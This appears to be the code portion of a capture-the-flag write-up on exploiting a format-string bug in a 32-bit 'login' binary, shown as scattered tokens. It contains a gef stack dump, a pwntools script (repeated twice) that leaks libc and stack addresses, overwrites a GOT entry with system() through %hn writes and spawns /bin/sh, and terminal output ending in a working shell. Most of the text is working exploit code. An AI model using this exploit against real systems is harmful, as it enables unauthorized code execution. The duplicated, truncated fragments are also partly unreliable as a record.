(sys_addr_0_2)
+
'c%7$hn'
+
'%'
+
str
(sys_addr_2_4
-
sys_addr_0_2)
+
'c%11$hn'
gef➤ dereference $esp
15
0xfff4d590
│
+
0x0000
:
0x0804b0a0
→
"/bin/sh"
← $esp
0xfff4d594
│
+
0x0004
:
0x08048dae
→
"wllmmllw"
0xfff4d598
│
+
0x0008
:
0x00000008
0xfff4d59c
│
+
0x000c
:
0x080485fb
→ add esp,
0x10
0xfff4d5a0
│
+
0x0010
:
0x08048dfd
→
"hello, %s"
0xfff4d5a4
│
+
0x0014
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5a8
│
+
0x0018
:
0xfff4d5b8
→
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e3
← $ebp
0xfff4d5ac
│
+
0x001c
:
0x0804b014
→
0xf7e3bdb0
→ <system
+
0
> sub esp,
0xc
0xfff4d5b0
│
+
0x0020
:
0x08048e20
→
"Base maybe not easy......"
0xfff4d5b4
│
+
0x0024
:
0x0804b080
→
0x00006461
(
"ad"
?)
0xfff4d5b8
│
+
0x0028
:
0xfff4d5bc
→
0x0804b016
→
0x0cb0f7e3
0xfff4d5bc
│
+
0x002c
:
0x0804b016
→
0x0cb0f7e3
0xfff4d5c0
│
+
0x0030
:
0xf7fb43dc
→
0xf7fb51e0
→
0x00000000
0xfff4d5c4
│
+
0x0034
:
0xfff4d5e0
→
0x00000001
0xfff4d5c8
│
+
0x0038
:
0x00000000
from
pwn
import
*
#from LibcSearcher import LibcSearcher
#p=remote('108.160.139.79',9090)
p
=
process(
'./login'
)
elf
=
ELF(
'./login'
)
libc
=
ELF(
'/lib/i386-linux-gnu/libc.so.6'
)
#context.log_level="debug"
p.sendafter(
'your name: '
,
'ad'
)
payload1
=
'\n%6$p\n%15$p\n'
p.sendafter(
'Please input your password: \n'
,payload1)
def DoubSzWt(number,deviation):
    """Return the conversion pair ``%<number>c%<deviation>$hn`` as a str.

    Both arguments are rendered with ``str()`` semantics; no range checking
    is done here.
    """
    return '%{0}c%{1}$hn'.format(number, deviation)
p.recvuntil(
'0x'
)
stack_addr
=
int
(p.recv(
8
),
16
)
p.recvuntil(
'0x'
)
libc_main_addr
=
int
(p.recv(
8
),
16
)
-
247
print
"libc_main_addr=>"
,
hex
(libc_main_addr)
'''libc=LibcSearcher('__libc_start_main',libc_main_addr)'''
libc_data
=
libc_main_addr
-
libc.symbols[
'__libc_start_main'
]
sys_addr
=
libc_data
+
libc.symbols[
'system'
]
#+0x480
#str_sh_addr=libc_data+libc.symbols['str_bin_sh']
str_bin_sh
=
libc.search(
"/bin/sh\x00"
).
next
()
sys_addr_0_2
=
int
(
str
(
hex
(sys_addr))[
6
:
10
],
16
)
sys_addr_2_4
=
int
(
str
(
hex
(sys_addr))[
2
:
6
],
16
)
stack_addr_0_2
=
int
(
str
(
hex
(stack_addr))[
6
:
10
],
16
)
print
"sys_addr=>"
,
hex
(sys_addr)
print
'sys_addr_0_2=>'
,
hex
(sys_addr_0_2)
print
'sys_addr_2_4=>'
,
hex
(sys_addr_2_4)
print
'stack_addr=>'
,
hex
(stack_addr)
print
'stack_addr_0_2=>'
,
hex
(stack_addr_0_2)
print
'libc_data=>'
,
hex
(libc_data)
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
-
12
,
6
))
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B014'
,
16
),
10
))
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
+
4
,
6
))
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B016'
,
16
),
10
))
'''
gdb.attach(p,'break *0x80485AF\nc')
pause()
'''
# in case sys_addr_2_4 < sys_addr_0_2 will fail
payload
=
'%'
+
str
(sys_addr_0_2)
+
'c%7$hn'
+
'%'
+
str
(sys_addr_2_4
-
sys_addr_0_2)
+
'c%11$hn'
p.sendafter(
'Try again!\n'
,payload)
p.sendafter(
'Try again!\n'
,
'/bin/sh\x00'
)
p.interactive()
from
pwn
import
*
#from LibcSearcher import LibcSearcher
#p=remote('108.160.139.79',9090)
p
=
process(
'./login'
)
elf
=
ELF(
'./login'
)
libc
=
ELF(
'/lib/i386-linux-gnu/libc.so.6'
)
#context.log_level="debug"
p.sendafter(
'your name: '
,
'ad'
)
payload1
=
'\n%6$p\n%15$p\n'
p.sendafter(
'Please input your password: \n'
,payload1)
def DoubSzWt(number,deviation):
    """Return the conversion pair ``%<number>c%<deviation>$hn`` as a str.

    Both arguments are rendered with ``str()`` semantics; no range checking
    is done here.
    """
    return '%{0}c%{1}$hn'.format(number, deviation)
p.recvuntil(
'0x'
)
stack_addr
=
int
(p.recv(
8
),
16
)
p.recvuntil(
'0x'
)
libc_main_addr
=
int
(p.recv(
8
),
16
)
-
247
print
"libc_main_addr=>"
,
hex
(libc_main_addr)
'''libc=LibcSearcher('__libc_start_main',libc_main_addr)'''
libc_data
=
libc_main_addr
-
libc.symbols[
'__libc_start_main'
]
sys_addr
=
libc_data
+
libc.symbols[
'system'
]
#+0x480
#str_sh_addr=libc_data+libc.symbols['str_bin_sh']
str_bin_sh
=
libc.search(
"/bin/sh\x00"
).
next
()
sys_addr_0_2
=
int
(
str
(
hex
(sys_addr))[
6
:
10
],
16
)
sys_addr_2_4
=
int
(
str
(
hex
(sys_addr))[
2
:
6
],
16
)
stack_addr_0_2
=
int
(
str
(
hex
(stack_addr))[
6
:
10
],
16
)
print
"sys_addr=>"
,
hex
(sys_addr)
print
'sys_addr_0_2=>'
,
hex
(sys_addr_0_2)
print
'sys_addr_2_4=>'
,
hex
(sys_addr_2_4)
print
'stack_addr=>'
,
hex
(stack_addr)
print
'stack_addr_0_2=>'
,
hex
(stack_addr_0_2)
print
'libc_data=>'
,
hex
(libc_data)
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
-
12
,
6
))
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B014'
,
16
),
10
))
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
+
4
,
6
))
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B016'
,
16
),
10
))
'''
gdb.attach(p,'break *0x80485AF\nc')
pause()
'''
# in case sys_addr_2_4 < sys_addr_0_2 will fail
payload
=
'%'
+
str
(sys_addr_0_2)
+
'c%7$hn'
+
'%'
+
str
(sys_addr_2_4
-
sys_addr_0_2)
+
'c%11$hn'
p.sendafter(
'Try again!\n'
,payload)
p.sendafter(
'Try again!\n'
,
'/bin/sh\x00'
)
p.interactive()
dc@ubuntu:~
/
playground$ python payload_login.py
[
+
] Starting local process
'./login'
: pid
80372
[
*
]
'/home/dc/playground/login'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
[
*
]
'/lib/i386-linux-gnu/libc.so.6'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
libc_main_addr
=
>
0xf7df4550
sys_addr
=
>
0xf7e16db0
sys_addr_0_2
=
>
0x6db0
sys_addr_2_4
=
>
0xf7e1
stack_addr
=
>
0xff849c68
stack_addr_0_2
=
>
0x9c68
libc_data
=
>
0xf7ddc000
[
*
] Switching to interactive mode
sh:
1
: This:
not
found
$ whoami
dc
dc@ubuntu:~
/
playground$ python payload_login.py
[
+
] Starting local process
'./login'
: pid
80372
[
*
]
'/home/dc/playground/login'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
[
*
]
'/lib/i386-linux-gnu/libc.so.6'
Arch: i386
-
32
-
little
RELRO: Partial RELRO